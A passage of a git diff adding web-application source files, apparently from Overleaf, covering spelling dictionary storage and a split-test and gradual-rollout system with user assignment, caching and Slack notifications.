SystemMessageManager.createMessage(req.body.content, function (error) { + if (error) { + return next(error) + } + res.redirect('/admin#system-messages') + }) + }, + + clearMessages(req, res, next) { + SystemMessageManager.clearMessages(function (error) { + if (error) { + return next(error) + } + res.redirect('/admin#system-messages') + }) + }, +} + +module.exports = AdminController diff --git a/services/web/app/src/Features/SocketDiagnostics/SocketDiagnostics.mjs b/services/web/app/src/Features/SocketDiagnostics/SocketDiagnostics.mjs new file mode 100644 index 0000000..74672bd --- /dev/null +++ b/services/web/app/src/Features/SocketDiagnostics/SocketDiagnostics.mjs @@ -0,0 +1,11 @@ +import { expressify } from '@overleaf/promise-utils' + +const index = async (req, res) => { + res.render('project/editor/socket_diagnostics') +} + +const SocketDiagnostics = { + index: expressify(index), +} + +export default SocketDiagnostics diff --git a/services/web/app/src/Features/Spelling/LearnedWordsManager.js b/services/web/app/src/Features/Spelling/LearnedWordsManager.js new file mode 100644 index 0000000..66d80fc --- /dev/null +++ b/services/web/app/src/Features/Spelling/LearnedWordsManager.js @@ -0,0 +1,94 @@ +const { db } = require('../../infrastructure/mongodb') +const { promisify } = require('util') +const OError = require('@overleaf/o-error') +const Settings = require('@overleaf/settings') +const { InvalidError } = require('../Errors/Errors') + +const LearnedWordsManager = { + learnWord(userToken, word, callback) { + LearnedWordsManager.getLearnedWordsSize(userToken, (error, wordsSize) => { + if (error != null) { + return callback(OError.tag(error)) + } + const wordSize = Buffer.from(word).length + if (wordsSize + wordSize > Settings.maxDictionarySize) { + return callback(new InvalidError('Max dictionary size reached')) + } + db.spellingPreferences.updateOne( + { + token: userToken, + }, + { + $addToSet: { learnedWords: word }, + }, + { + upsert: true, + }, + callback + ) + }) + }, + + unlearnWord(userToken, word, callback) { + return db.spellingPreferences.updateOne( + { + token: userToken, + }, + { + $pull: { learnedWords: word }, + }, + callback + ) + }, + + getLearnedWords(userToken, callback) { + db.spellingPreferences.findOne( + { token: userToken }, + function (error, preferences) { + if (error != null) { + return callback(OError.tag(error)) + } + let words = + (preferences != null ? preferences.learnedWords : undefined) || [] + if (words) { + // remove duplicates + words = words.filter( + (value, index, self) => self.indexOf(value) === index + ) + } + callback(null, words) + } + ) + }, + + getLearnedWordsSize(userToken, callback) { + db.spellingPreferences.findOne( + { token: userToken }, + function (error, preferences) { + if (error != null) { + return callback(OError.tag(error)) + } + const words = (preferences && preferences.learnedWords) || [] + const wordsSize = Buffer.from(JSON.stringify(words)).length + callback(null, wordsSize) + } + ) + }, + + deleteUsersLearnedWords(userToken, callback) { + db.spellingPreferences.deleteOne({ token: userToken }, callback) + }, +} + +const promises = { + learnWord: promisify(LearnedWordsManager.learnWord), + unlearnWord: promisify(LearnedWordsManager.unlearnWord), + getLearnedWords: promisify(LearnedWordsManager.getLearnedWords), + deleteUsersLearnedWords: promisify( + LearnedWordsManager.deleteUsersLearnedWords + ), +} + +LearnedWordsManager.promises = promises + +module.exports = LearnedWordsManager diff --git a/services/web/app/src/Features/Spelling/SpellingController.mjs b/services/web/app/src/Features/Spelling/SpellingController.mjs new file mode 100644 index 0000000..7790193 --- /dev/null +++ b/services/web/app/src/Features/Spelling/SpellingController.mjs @@ -0,0 +1,22 @@ +import SessionManager from '../Authentication/SessionManager.js' +import LearnedWordsManager from './LearnedWordsManager.js' + +export default { + learn(req, res, next) { + const { word } = req.body + const userId = SessionManager.getLoggedInUserId(req.session) + LearnedWordsManager.learnWord(userId, word, err => { + if (err) return next(err) + res.sendStatus(204) + }) + }, + + unlearn(req, res, next) { + const { word } = req.body + const userId = SessionManager.getLoggedInUserId(req.session) + LearnedWordsManager.unlearnWord(userId, word, err => { + if (err) return next(err) + res.sendStatus(204) + }) + }, +} diff --git a/services/web/app/src/Features/Spelling/SpellingHandler.js b/services/web/app/src/Features/Spelling/SpellingHandler.js new file mode 100644 index 0000000..8d6c42b --- /dev/null +++ b/services/web/app/src/Features/Spelling/SpellingHandler.js @@ -0,0 +1,29 @@ +const OError = require('@overleaf/o-error') +const Metrics = require('@overleaf/metrics') +const { promisifyAll } = require('@overleaf/promise-utils') +const LearnedWordsManager = require('./LearnedWordsManager') + +module.exports = { + getUserDictionary(userId, callback) { + const timer = new Metrics.Timer('spelling_get_dict') + LearnedWordsManager.getLearnedWords(userId, (error, words) => { + if (error) { + return callback( + OError.tag(error, 'error getting user dictionary', { error, userId }) + ) + } + timer.done() + callback(null, words) + }) + }, + + deleteWordFromUserDictionary(userId, word, callback) { + LearnedWordsManager.unlearnWord(userId, word, callback) + }, + + deleteUserDictionary(userId, callback) { + LearnedWordsManager.deleteUsersLearnedWords(userId, callback) + }, +} + +module.exports.promises = promisifyAll(module.exports) diff --git a/services/web/app/src/Features/SplitTests/LocalsHelper.js b/services/web/app/src/Features/SplitTests/LocalsHelper.js new file mode 100644 index 0000000..14bfa96 --- /dev/null +++ b/services/web/app/src/Features/SplitTests/LocalsHelper.js @@ -0,0 +1,18 @@ +function setSplitTestVariant(locals, splitTestName, variant) { + if (!locals.splitTestVariants) { + locals.splitTestVariants = {} + } + locals.splitTestVariants[splitTestName] = variant +} + +function setSplitTestInfo(locals, splitTestName, info) { + if (!locals.splitTestInfo) { + locals.splitTestInfo = {} + } + locals.splitTestInfo[splitTestName] = info +} + +module.exports = { + setSplitTestVariant, + setSplitTestInfo, +} diff --git a/services/web/app/src/Features/SplitTests/SlackNotificationManager.js b/services/web/app/src/Features/SplitTests/SlackNotificationManager.js new file mode 100644 index 0000000..e90d495 --- /dev/null +++ b/services/web/app/src/Features/SplitTests/SlackNotificationManager.js @@ -0,0 +1,65 @@ +const logger = require('@overleaf/logger') +const Settings = require('@overleaf/settings') +const { IncomingWebhook } = require('@slack/webhook') +const moment = require('moment') +const SplitTestUtils = require('./SplitTestUtils') + +async function sendNotification(splitTest, action, user) { + const lastVersion = SplitTestUtils.getCurrentVersion(splitTest) + const url = lastVersion.analyticsEnabled + ? Settings.splitTest.notification.splitTestSlackWebhookUrl + : Settings.splitTest.notification.gradualRolloutSlackWebhookUrl + if (!url) { + logger.info('Skipping slack notification as webhook URL is not configured') + return + } + + const webhook = new IncomingWebhook(url) + + const defaultRolloutPercent = + 100 - + lastVersion.variants.reduce( + (total, variant) => total + variant.rolloutPercent, + 0 + ) + const variantsConfig = [ + `- default: ${defaultRolloutPercent}%`, + ...lastVersion.variants.map( + variant => `- ${variant.name}: ${variant.rolloutPercent}%` + ), + ].join('\n') + + const date = splitTest.archived ? splitTest.archivedAt : lastVersion.createdAt + const comment = + action !== 'archived' && lastVersion.comment + ? `with comment: ${lastVersion.comment}` + : '' + + const payload = { + name: splitTest.name, + action, + phase: lastVersion.phase, + description: splitTest.description, + ticketURL: splitTest.ticketUrl, + variantsConfig, + active: lastVersion.active.toString(), + author: user.email, + date: moment(date).utc().format('Do MMM YYYY, h:mm a') + ' UTC', + comment, + versionNumber: `${lastVersion.versionNumber}`, + url: `${Settings.siteUrl}/admin/split-test/edit/${splitTest.name}`, + } + try { + const { send: sendPayload } = webhook // workaround for the lint_flag_res_send_usage rule false-positive + await sendPayload.call(webhook, payload) + } catch (err) { + logger.error( + { err }, + 'Failed to notify split test notifications Slack webhook' + ) + } +} + +module.exports = { + sendNotification, +} diff --git a/services/web/app/src/Features/SplitTests/SplitTestCache.js b/services/web/app/src/Features/SplitTests/SplitTestCache.js new file mode 100644 index 0000000..4f81b45 --- /dev/null +++ b/services/web/app/src/Features/SplitTests/SplitTestCache.js @@ -0,0 +1,27 @@ +const Metrics = require('@overleaf/metrics') +const SplitTestManager = require('./SplitTestManager') +const { CacheLoader } = require('cache-flow') + +class SplitTestCache extends CacheLoader { + constructor() { + super('split-test', { + expirationTime: 60, // 1min in seconds + }) + } + + async load() { + Metrics.inc('split_test_get_split_test_from_mongo', 1, {}) + const splitTests = await SplitTestManager.getRuntimeTests() + return new Map(splitTests.map(splitTest => [splitTest.name, splitTest])) + } + + serialize(value) { + return value + } + + deserialize(value) { + return value + } +} + +module.exports = new SplitTestCache() diff --git a/services/web/app/src/Features/SplitTests/SplitTestHandler.js b/services/web/app/src/Features/SplitTests/SplitTestHandler.js new file mode 100644 index 0000000..5dcf009 --- /dev/null +++ b/services/web/app/src/Features/SplitTests/SplitTestHandler.js @@ -0,0 +1,691 @@ +const Metrics = require('@overleaf/metrics') +const UserUpdater = require('../User/UserUpdater') +const AnalyticsManager = require('../Analytics/AnalyticsManager') +const LocalsHelper = require('./LocalsHelper') +const crypto = require('crypto') +const _ = require('lodash') +const { callbackify } = require('util') +const SplitTestCache = require('./SplitTestCache') +const { SplitTest } = require('../../models/SplitTest') +const UserAnalyticsIdCache = require('../Analytics/UserAnalyticsIdCache') +const Features = require('../../infrastructure/Features') +const SplitTestUtils = require('./SplitTestUtils') +const Settings = require('@overleaf/settings') +const SessionManager = require('../Authentication/SessionManager') +const logger = require('@overleaf/logger') +const SplitTestSessionHandler = require('./SplitTestSessionHandler') +const SplitTestUserGetter = require('./SplitTestUserGetter') + +/** + * @import { Assignment } from "./types" + */ + +const DEFAULT_VARIANT = 'default' +const ALPHA_PHASE = 'alpha' +const BETA_PHASE = 'beta' +const RELEASE_PHASE = 'release' +const DEFAULT_ASSIGNMENT = { + variant: DEFAULT_VARIANT, + metadata: {}, +} + +/** + * Get the assignment of a user to a split test and store it in the response locals context + * + * @example + * // Assign user and record an event + * + * const assignment = await SplitTestHandler.getAssignment(req, res, 'example-project') + * if (assignment.variant === 'awesome-new-version') { + * // execute my awesome change + * } + * else { + * // execute the default behaviour (control group) + * } + * + * @param req the request + * @param res the Express response object + * @param splitTestName the unique name of the split test + * @param options {Object<sync: boolean>} - for test purposes only, to force the synchronous update of the user's profile + * @returns {Promise<Assignment>} + */ +async function getAssignment(req, res, splitTestName, { sync = false } = {}) { + const query = req.query || {} + let assignment + + try { + if (!Features.hasFeature('saas')) { + assignment = _getNonSaasAssignment(splitTestName) + } else { + await _loadSplitTestInfoInLocals(res.locals, splitTestName, req.session) + + // Check the query string for an override, ignoring an invalid value + const queryVariant = query[splitTestName] + if (queryVariant) { + const variants = await _getVariantNames(splitTestName) + if (variants.includes(queryVariant)) { + assignment = { + variant: queryVariant, + metadata: {}, + } + } + } + + if (!assignment) { + const { userId, analyticsId } = AnalyticsManager.getIdsFromSession( + req.session + ) + assignment = await _getAssignment(splitTestName, { + analyticsId, + userId, + session: req.session, + sync, + }) + SplitTestSessionHandler.collectSessionStats(req.session) + } + } + } catch (error) { + logger.error({ err: error }, 'Failed to get split test assignment') + assignment = DEFAULT_ASSIGNMENT + } + + LocalsHelper.setSplitTestVariant( + res.locals, + splitTestName, + assignment.variant + ) + + return assignment +} + +/** + * Get the assignment of a user to a split test by their user ID. + * + * Warning: this does not support query parameters override, nor makes the assignment and split test info available to + * the frontend through locals. Wherever possible, `getAssignment` should be used instead. + * + * @param userId the user ID + * @param splitTestName the unique name of the split test + * @param options {Object<sync: boolean>} - for test purposes only, to force the synchronous update of the user's profile + * @returns {Promise<Assignment>} + */ +async function getAssignmentForUser( + userId, + splitTestName, + { sync = false } = {} +) { + try { + if (!Features.hasFeature('saas')) { + return _getNonSaasAssignment(splitTestName) + } + + const analyticsId = await UserAnalyticsIdCache.get(userId) + return _getAssignment(splitTestName, { analyticsId, userId, sync }) + } catch (error) { + logger.error({ err: error }, 'Failed to get split test assignment for user') + return DEFAULT_ASSIGNMENT + } +} + +/** + * Returns true if user has already been explicitly assigned to a variant. + * This will be false if the user **would** be assigned when calling getAssignment but hasn't yet. + * + * @param req express request + * @param {string} userId the user ID + * @param {string} splitTestName the unique name of the split test + * @param {string} variant variant name to check + * @param {boolean} ignoreVersion users explicitly assigned to a previous version should be treated as if assigned to latest version + */ +async function hasUserBeenAssignedToVariant( + req, + userId, + splitTestName, + variant, + ignoreVersion = false +) { + try { + const { session, query = {} } = req + + const splitTest = await _getSplitTest(splitTestName) + const currentVersion = SplitTestUtils.getCurrentVersion(splitTest) + + if ( + !userId || + !SessionManager.isUserLoggedIn(session) || + !currentVersion?.active + ) { + return false + } + + // Check the query string for an override, ignoring an invalid value + const queryVariant = query[splitTestName] + if (queryVariant === variant) { + const variants = await _getVariantNames(splitTestName) + if (variants.includes(queryVariant)) { + return true + } + } + + // Allow dev toolbar and session cache to override assignment from DB + if (Settings.devToolbar.enabled) { + const override = session?.splitTestOverrides?.[splitTestName] + if (override === variant) { + return true + } + } + + const canUseSessionCache = session && SessionManager.isUserLoggedIn(session) + if (canUseSessionCache) { + const cachedVariant = SplitTestSessionHandler.getCachedVariant( + session, + splitTestName, + currentVersion + ) + if (cachedVariant === variant) { + return true + } + } + + // get variant from db, including explicit assignments from previous versions if requested + const assignments = await getActiveAssignmentsForUser( + userId, + true, + ignoreVersion + ) + const testAssignment = assignments[splitTestName] + + if (!testAssignment || !testAssignment.assignedAt) { + return false + } + + // if variant matches and we can use cache, we should persist it in cache + if (testAssignment.variantName === variant && testAssignment.assignedAt) { + if (canUseSessionCache) { + SplitTestSessionHandler.setVariantInCache({ + session, + splitTestName, + currentVersion, + selectedVariantName: variant, + activeForUser: true, + }) + } + return true + } + } catch (error) { + logger.error({ err: error }, 'Failed to get split test assignment for user') + return false + } +} + +/** + * Get a mapping of the active split test assignments for the given user + */ +async function getActiveAssignmentsForUser( + userId, + removeArchived = false, + ignoreVersion = false +) { + if (!Features.hasFeature('saas')) { + return {} + } + + const user = await SplitTestUserGetter.promises.getUser(userId) + if (user == null) { + return {} + } + + const splitTests = await SplitTest.find({ + $where: 'this.versions[this.versions.length - 1].active', + ...(removeArchived && { archived: { $ne: true } }), + }).exec() + const assignments = {} + for (const splitTest of splitTests) { + const { activeForUser, selectedVariantName, phase, versionNumber } = + await _getAssignmentMetadata(user.analyticsId, user, splitTest) + if (activeForUser) { + const assignment = { + variantName: selectedVariantName, + versionNumber, + phase, + } + const userAssignments = user.splitTests?.[splitTest.name] + if (Array.isArray(userAssignments)) { + let userAssignment + if (!ignoreVersion) { + userAssignment = userAssignments.find( + x => x.versionNumber === versionNumber + ) + } else { + userAssignment = userAssignments[0] + } + if (userAssignment) { + assignment.assignedAt = userAssignment.assignedAt + } + } + assignments[splitTest.name] = assignment + } + } + return assignments +} + +/** + * Performs a one-time assignment that is not recorded nor reproducible. + * To be used only in cases where we need random assignments that are independent of a user or session. + * If the test is in alpha or beta phase, always returns the default variant. + * @param splitTestName + * @returns {Promise<Assignment>} + */ +async function getOneTimeAssignment(splitTestName) { + try { + if (!Features.hasFeature('saas')) { + return _getNonSaasAssignment(splitTestName) + } + + const splitTest = await _getSplitTest(splitTestName) + if (!splitTest) { + return DEFAULT_ASSIGNMENT + } + const currentVersion = SplitTestUtils.getCurrentVersion(splitTest) + + if (currentVersion.phase !== RELEASE_PHASE) { + return DEFAULT_ASSIGNMENT + } + + const randomUUID = crypto.randomUUID() + const { selectedVariantName } = await _getAssignmentMetadata( + randomUUID, + undefined, + splitTest + ) + return _makeAssignment({ + variant: selectedVariantName, + currentVersion, + isFirstNonDefaultAssignment: + selectedVariantName !== DEFAULT_VARIANT && _isSplitTest(splitTest), + }) + } catch (error) { + logger.error({ err: error }, 'Failed to get one time split test assignment') + return DEFAULT_ASSIGNMENT + } +} + +/** + * Returns an array of valid variant names for the given split test, including default + * + * @param splitTestName + * @returns {Promise<string[]>} + * @private + */ +async function _getVariantNames(splitTestName) { + const splitTest = await _getSplitTest(splitTestName) + const currentVersion = SplitTestUtils.getCurrentVersion(splitTest) + if (currentVersion?.active) { + return currentVersion.variants.map(v => v.name).concat([DEFAULT_VARIANT]) + } else { + return [DEFAULT_VARIANT] + } +} + +async function _getAssignment( + splitTestName, + { analyticsId, user, userId, session, sync } +) { + if (!analyticsId && !userId) { + return DEFAULT_ASSIGNMENT + } + + const splitTest = await _getSplitTest(splitTestName) + const currentVersion = SplitTestUtils.getCurrentVersion(splitTest) + + if (Settings.devToolbar.enabled) { + const override = session?.splitTestOverrides?.[splitTestName] + if (override) { + return _makeAssignment({ variant: override, currentVersion }) + } + } + + if (!currentVersion?.active) { + return DEFAULT_ASSIGNMENT + } + + // Do not cache assignments for anonymous users. All the context for their assignments is in the session: + // They cannot be part of the alpha or beta program, and they will use their analyticsId for assignments. + const canUseSessionCache = session && SessionManager.isUserLoggedIn(session) + if (session && !canUseSessionCache) { + // Purge the existing cache + delete session.cachedSplitTestAssignments + } + + if (canUseSessionCache) { + const cachedVariant = SplitTestSessionHandler.getCachedVariant( + session, + splitTest.name, + currentVersion + ) + + if (cachedVariant) { + Metrics.inc('split_test_get_assignment_source', 1, { status: 'cache' }) + if ( + cachedVariant === + SplitTestSessionHandler.CACHE_TOMBSTONE_SPLIT_TEST_NOT_ACTIVE_FOR_USER + ) { + return DEFAULT_ASSIGNMENT + } else { + return _makeAssignment({ + variant: cachedVariant, + currentVersion, + isFirstNonDefaultAssignment: false, + }) + } + } + } + + if (user) { + Metrics.inc('split_test_get_assignment_source', 1, { status: 'provided' }) + } else if (userId) { + Metrics.inc('split_test_get_assignment_source', 1, { status: 'mongo' }) + } else { + Metrics.inc('split_test_get_assignment_source', 1, { status: 'none' }) + } + + user = + user || + (userId && + (await SplitTestUserGetter.promises.getUser(userId, splitTestName))) + const metadata = await _getAssignmentMetadata(analyticsId, user, splitTest) + const { activeForUser, selectedVariantName, phase, versionNumber } = metadata + + if (canUseSessionCache) { + SplitTestSessionHandler.setVariantInCache({ + session, + splitTestName, + currentVersion, + selectedVariantName, + activeForUser, + }) + } + + if (activeForUser) { + if (_isSplitTest(splitTest)) { + // if the user is logged in, persist the assignment + if (userId) { + const assignmentData = { + user, + userId, + splitTestName, + phase, + versionNumber, + variantName: selectedVariantName, + } + if (sync === true) { + await _recordAssignment(assignmentData) + } else { + _recordAssignment(assignmentData).catch(err => { + logger.warn( + { + err, + userId, + splitTestName, + phase, + versionNumber, + variantName: selectedVariantName, + }, + 'failed to record split test assignment' + ) + }) + } + } + // otherwise this is an anonymous user, we store assignments in session to persist them on registration + else { + await SplitTestSessionHandler.promises.appendAssignment(session, { + splitTestId: splitTest._id, + splitTestName, + phase, + versionNumber, + variantName: selectedVariantName, + assignedAt: new Date(), + }) + } + + const effectiveAnalyticsId = user?.analyticsId || analyticsId || userId + AnalyticsManager.setUserPropertyForAnalyticsId( + effectiveAnalyticsId, + `split-test-${splitTestName}-${versionNumber}`, + selectedVariantName + ).catch(err => { + logger.warn( + { + err, + analyticsId: effectiveAnalyticsId, + splitTest: splitTestName, + versionNumber, + variant: selectedVariantName, + }, + 'failed to set user property for analytics id' + ) + }) + } + let isFirstNonDefaultAssignment + if (userId) { + isFirstNonDefaultAssignment = metadata.isFirstNonDefaultAssignment + } else { + const assignments = + await SplitTestSessionHandler.promises.getAssignments(session) + isFirstNonDefaultAssignment = !assignments?.[splitTestName] + } + + return _makeAssignment({ + variant: selectedVariantName, + currentVersion, + isFirstNonDefaultAssignment, + }) + } + + return DEFAULT_ASSIGNMENT +} + +async function _getAssignmentMetadata(analyticsId, user, splitTest) { + const currentVersion = SplitTestUtils.getCurrentVersion(splitTest) + const versionNumber = currentVersion.versionNumber + const phase = currentVersion.phase + + // For continuity on phase rollout for gradual rollouts, we keep all users from the previous phase enrolled to the variant. + // In beta, all alpha users are cohorted to the variant, and the same in release phase all alpha & beta users. + if ( + _isGradualRollout(splitTest) && + ((phase === BETA_PHASE && user?.alphaProgram) || + (phase === RELEASE_PHASE && (user?.alphaProgram || user?.betaProgram))) + ) { + return { + activeForUser: true, + selectedVariantName: currentVersion.variants[0].name, + phase, + versionNumber, + isFirstNonDefaultAssignment: false, + } + } + + if ( + (phase === ALPHA_PHASE && !user?.alphaProgram) || + (phase === BETA_PHASE && !user?.betaProgram) + ) { + return { + activeForUser: false, + } + } + + const userId = user?._id.toString() + const percentile = getPercentile(analyticsId || userId, splitTest.name, phase) + const selectedVariantName = + _getVariantFromPercentile(currentVersion.variants, percentile) || + DEFAULT_VARIANT + return { + activeForUser: true, + selectedVariantName, + phase, + versionNumber, + isFirstNonDefaultAssignment: + selectedVariantName !== DEFAULT_VARIANT && + _isSplitTest(splitTest) && + (!Array.isArray(user?.splitTests?.[splitTest.name]) || + !user?.splitTests?.[splitTest.name]?.some( + assignment => assignment.variantName !== DEFAULT_VARIANT + )), + } +} + +function getPercentile(analyticsId, splitTestName, splitTestPhase) { + const hash = crypto + .createHash('md5') + .update(analyticsId + splitTestName + splitTestPhase) + .digest('hex') + const hashPrefix = hash.substr(0, 8) + return Math.floor( + ((parseInt(hashPrefix, 16) % 0xffffffff) / 0xffffffff) * 100 + ) +} + +function setOverrideInSession(session, splitTestName, variantName) { + if (!Settings.devToolbar.enabled) { + return + } + if (!session.splitTestOverrides) { + session.splitTestOverrides = {} + } + session.splitTestOverrides[splitTestName] = variantName +} + +function clearOverridesInSession(session) { + delete session.splitTestOverrides +} + +function _getVariantFromPercentile(variants, percentile) { + for (const variant of variants) { + for (const stripe of variant.rolloutStripes) { + if (percentile >= stripe.start && percentile < stripe.end) { + return variant.name + } + } + } +} + +async function _recordAssignment({ + user, + userId, + splitTestName, + phase, + versionNumber, + variantName, +}) { + const persistedAssignment = { + variantName, + versionNumber, + phase, + assignedAt: new Date(), + } + user = + user || (await SplitTestUserGetter.promises.getUser(userId, splitTestName)) + if (user) { + const assignedSplitTests = user.splitTests || [] + const assignmentLog = assignedSplitTests[splitTestName] || [] + const existingAssignment = _.find(assignmentLog, { versionNumber }) + if (!existingAssignment) { + await UserUpdater.promises.updateUser(userId, { + $addToSet: { + [`splitTests.${splitTestName}`]: persistedAssignment, + }, + }) + } + } +} + +function _makeAssignment({ + variant, + currentVersion, + isFirstNonDefaultAssignment, +}) { + return { + variant, + metadata: { + phase: currentVersion.phase, + versionNumber: currentVersion.versionNumber, + isFirstNonDefaultAssignment, + }, + } +} + +async function _loadSplitTestInfoInLocals(locals, splitTestName, session) { + const splitTest = await _getSplitTest(splitTestName) + if (splitTest) { + const override = session?.splitTestOverrides?.[splitTestName] + + const currentVersion = SplitTestUtils.getCurrentVersion(splitTest) + if (!currentVersion.active && !Settings.devToolbar.enabled) { + return + } + + const phase = currentVersion.phase + const info = { + phase, + badgeInfo: splitTest.badgeInfo?.[phase], + } + if (Settings.devToolbar.enabled) { + info.active = currentVersion.active + info.variants = currentVersion.variants.map(variant => ({ + name: variant.name, + rolloutPercent: variant.rolloutPercent, + })) + info.hasOverride = !!override + } + LocalsHelper.setSplitTestInfo(locals, splitTestName, info) + } else if (Settings.devToolbar.enabled) { + LocalsHelper.setSplitTestInfo(locals, splitTestName, { + missing: true, + }) + } +} + +function _getNonSaasAssignment(splitTestName) { + if (Settings.splitTestOverrides?.[splitTestName]) { + return { + variant: Settings.splitTestOverrides?.[splitTestName], + metadata: {}, + } + } + return DEFAULT_ASSIGNMENT +} + +async function _getSplitTest(name) { + const splitTests = await SplitTestCache.get('') + const splitTest = splitTests?.get(name) + if (splitTest && !splitTest.archived) { + return splitTest + } +} + +function _isSplitTest(featureFlag) { + return SplitTestUtils.getCurrentVersion(featureFlag).analyticsEnabled +} + +function _isGradualRollout(featureFlag) { + return !SplitTestUtils.getCurrentVersion(featureFlag).analyticsEnabled +} + +module.exports = { + getPercentile, + getAssignment: callbackify(getAssignment), + getAssignmentForUser: callbackify(getAssignmentForUser), + getOneTimeAssignment: callbackify(getOneTimeAssignment), + getActiveAssignmentsForUser: callbackify(getActiveAssignmentsForUser), + hasUserBeenAssignedToVariant: callbackify(hasUserBeenAssignedToVariant), + setOverrideInSession, + clearOverridesInSession, + promises: { + getAssignment, + getAssignmentForUser, + getOneTimeAssignment, + getActiveAssignmentsForUser, + hasUserBeenAssignedToVariant, + }, +} diff --git a/services/web/app/src/Features/SplitTests/SplitTestManager.js b/services/web/app/src/Features/SplitTests/SplitTestManager.js new file mode 100644 index 0000000..16120f5 --- /dev/null +++ b/services/web/app/src/Features/SplitTests/SplitTestManager.js @@ -0,0 +1,485 @@ +const { SplitTest } = require('../../models/SplitTest') +const SplitTestUtils = require('./SplitTestUtils') +const OError = require('@overleaf/o-error') +const _ = require('lodash') +const { CacheFlow } = require('cache-flow') + +const ALPHA_PHASE = 'alpha' +const BETA_PHASE = 'beta' +const RELEASE_PHASE = 'release' + +async function getSplitTests({ name, phase, type, active, archived }) { + const filters = {} + if (name && name !== '') { + filters.name = { $regex: _.escapeRegExp(name) } + } + if (active) { + filters.$where = 'this.versions[this.versions.length - 1].active === true' + } + if (type === 'split-test') { + const query = + 'this.versions[this.versions.length - 1].analyticsEnabled === true' + if (filters.$where) { + filters.$where += `&& ${query}` + } else { + filters.$where = query + } + } + if (type === 'gradual-rollout') { + const query = + 'this.versions[this.versions.length - 1].analyticsEnabled === false' + if (filters.$where) { + filters.$where += `&& ${query}` + } else { + filters.$where = query + } + } + if (['alpha', 'beta', 'release'].includes(phase)) { + const query = `this.versions[this.versions.length - 1].phase === "${phase}"` + if (filters.$where) { + filters.$where += `&& ${query}` + } else { + filters.$where = query + } + } + if (archived === true) { + filters.archived = true + } else if (archived === false) { + filters.archived = { $ne: true } + } + try { + return await SplitTest.find(filters) + .populate('archivedBy', ['email', 'first_name', 'last_name']) + .populate('versions.author', ['email', 'first_name', 'last_name']) + .limit(300) + .exec() + } catch (error) { + throw OError.tag(error, 'Failed to get split tests list') + } +} + +async function getRuntimeTests() { + try { + return SplitTest.find({}).lean().exec() + } catch (error) { + throw OError.tag(error, 'Failed to get active split tests list') + } +} + +async function getSplitTest(query) { + try { + return await SplitTest.findOne(query) + .populate('archivedBy', ['email', 'first_name', 'last_name']) + .populate('versions.author', ['email', 'first_name', 'last_name']) + .exec() + } catch (error) { + throw OError.tag(error, 'Failed to get split test', { query }) + } +} + +async function createSplitTest( + { name, configuration, badgeInfo = {}, info = {} }, + userId +) { + const stripedVariants = [] + let stripeStart = 0 + + _checkNewVariantsConfiguration( + [], + configuration.variants, + configuration.analyticsEnabled + ) + for (const variant of configuration.variants) { + stripedVariants.push({ + name: (variant.name || '').trim(), + rolloutPercent: variant.rolloutPercent, + rolloutStripes: + variant.rolloutPercent > 0 + ? [ + { + start: stripeStart, + end: stripeStart + variant.rolloutPercent, + }, + ] + : [], + }) + stripeStart += variant.rolloutPercent + } + const splitTest = new SplitTest({ + name: (name || '').trim(), + description: info.description, + ticketUrl: info.ticketUrl, + reportsUrls: info.reportsUrls, + winningVariant: info.winningVariant, + badgeInfo, + versions: [ + { + versionNumber: 1, + phase: configuration.phase, + active: configuration.active, + analyticsEnabled: + configuration.active && configuration.analyticsEnabled, + variants: stripedVariants, + author: userId, + }, + ], + expectedEndDate: info.expectedEndDate, + expectedUplift: info.expectedUplift, + requiredCohortSize: info.requiredCohortSize, + }) + return _saveSplitTest(splitTest) +} + +async function updateSplitTestConfig({ name, configuration, comment }, userId) { + const splitTest = await getSplitTest({ name }) + if (!splitTest) { + throw new OError(`Cannot update split test '${name}': not found`) + } + if (splitTest.archived) { + throw new OError('Cannot update an archived split test', { name }) + } + const lastVersion = SplitTestUtils.getCurrentVersion(splitTest).toObject() + if (configuration.phase !== lastVersion.phase) { + throw new OError( + `Cannot update with different phase - use /switch-to-next-phase endpoint instead` + ) + } + _checkNewVariantsConfiguration( + lastVersion.variants, + configuration.variants, + configuration.analyticsEnabled + ) + const updatedVariants = _updateVariantsWithNewConfiguration( + lastVersion.variants, + configuration.variants + ) + + splitTest.versions.push({ + versionNumber: lastVersion.versionNumber + 1, + phase: configuration.phase, + active: configuration.active, + analyticsEnabled: configuration.analyticsEnabled, + variants: updatedVariants, + author: userId, + comment, + }) + return _saveSplitTest(splitTest) +} + +async function updateSplitTestInfo(name, info) { + const splitTest = await getSplitTest({ name }) + if (!splitTest) { + throw new OError(`Cannot update split test '${name}': not found`) + } + splitTest.description = info.description + splitTest.expectedEndDate = info.expectedEndDate + splitTest.ticketUrl = info.ticketUrl + splitTest.reportsUrls = info.reportsUrls + splitTest.winningVariant = info.winningVariant + return _saveSplitTest(splitTest) +} + +async function updateSplitTestBadgeInfo(name, badgeInfo) { + const splitTest = await getSplitTest({ name }) + if (!splitTest) { + throw new OError(`Cannot update split test '${name}': not found`) + } + splitTest.badgeInfo = badgeInfo + return _saveSplitTest(splitTest) +} + +async function replaceSplitTests(tests) { + _checkEnvIsSafe('replace') + + try { + await _deleteSplitTests() + return await SplitTest.create(tests) + } catch (error) { + throw OError.tag(error, 'Failed to replace all split tests', { tests }) + } +} + +async function mergeSplitTests(incomingTests, overWriteLocal) { + _checkEnvIsSafe('merge') + + // this is required as the query returns models, and we need all the items to be objects, + // similar to the ones we recieve as incomingTests + const localTests = await SplitTest.find({}).lean().exec() + + let merged + // we preserve the state of the local tests (baseTests) + // eg: if inTest is in phase 1, and basetest is in phase 2, the merged will be in state 2 + // therefore, we can have the opposite effect by swapping the order of args (overwrite locals with sent tests) + if (overWriteLocal) { + merged = _mergeFlags(localTests, incomingTests) + } else { + merged = _mergeFlags(incomingTests, localTests) + } + + try { + await _deleteSplitTests() + const success = await SplitTest.create(merged) + return success + } catch (error) { + throw OError.tag(error, 'Failed to merge all split tests, merged set was', { + merged, + }) + } +} + +async function switchToNextPhase({ name, comment }, userId) { + const splitTest = await getSplitTest({ name }) + if (!splitTest) { + throw new OError( + `Cannot switch split test with ID '${name}' to next phase: not found` + ) + } + if (splitTest.archived) { + throw new OError('Cannot switch an archived split test to next phase', { + name, + }) + } + const lastVersionCopy = SplitTestUtils.getCurrentVersion(splitTest).toObject() + lastVersionCopy.versionNumber++ + if (lastVersionCopy.phase === ALPHA_PHASE) { + lastVersionCopy.phase = BETA_PHASE + } else if (lastVersionCopy.phase === BETA_PHASE) { + if (splitTest.forbidReleasePhase) { + throw new OError('Switch to release phase is disabled for this test', { + name, + }) + } + lastVersionCopy.phase = RELEASE_PHASE + } else if (splitTest.phase === 